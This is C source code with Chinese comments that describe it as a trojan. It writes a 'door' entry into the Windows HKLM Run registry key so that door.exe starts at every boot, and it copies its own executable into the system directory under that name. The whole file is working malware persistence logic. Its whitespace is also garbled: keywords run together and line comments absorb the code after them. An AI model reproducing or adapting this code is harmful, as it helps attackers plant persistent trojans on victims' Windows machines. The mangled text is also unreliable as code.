#include<stdio.h>#include<Windows.h>intmain(void){char regname[]="Software\\Microsoft\\Windows\\CurrentVersion\\Run";//注册表路径
HKEY hkResult;//声明一个句柄int ret;char modlepath[256];//声明木马文件名字符串变量char syspath[256];//系统路径变量
ret =RegOpenKey(HKEY_LOCAL_MACHINE,regname,&hkResult);//打开对应的key
ret =RegSetValueEx(hkResult,"door",0,REG_EXPAND_SZ,(unsignedchar*)"%systemroot%\\door.exe",25);//在key里添加一个新的值if(ret==0){printf("success to write run key\n");RegCloseKey(hkResult);}else{printf("failed to open regedit.%d\n", ret);return0;}GetModuleFileName(0,modlepath,256);//函数功能:获取Windows文件夹的路径//printf("%s\n",modlepath);GetSystemDirectory(syspath,256);//获取systrm32文件夹的路径//printf("%s\n",syspath);/*把木马克隆到指定的文件夹内
copyfile(
lpcstr lpexistingfilename, //源文件路径
lpcstr lpnewfilename, //新文件路径
bool bfailifexists //为true的话,如果新文件已存在, 则返回false;
为false的话,如果新文件已存在,会将原文件覆盖*/
ret =CopyFile(modlepath,strcat(syspath,"\\door.exe"),1);if(ret){printf("%s has been copyed to sys dir %s\n",modlepath,syspath);}else{printf("%s is exisis",modlepath);}system("pause");return0;}
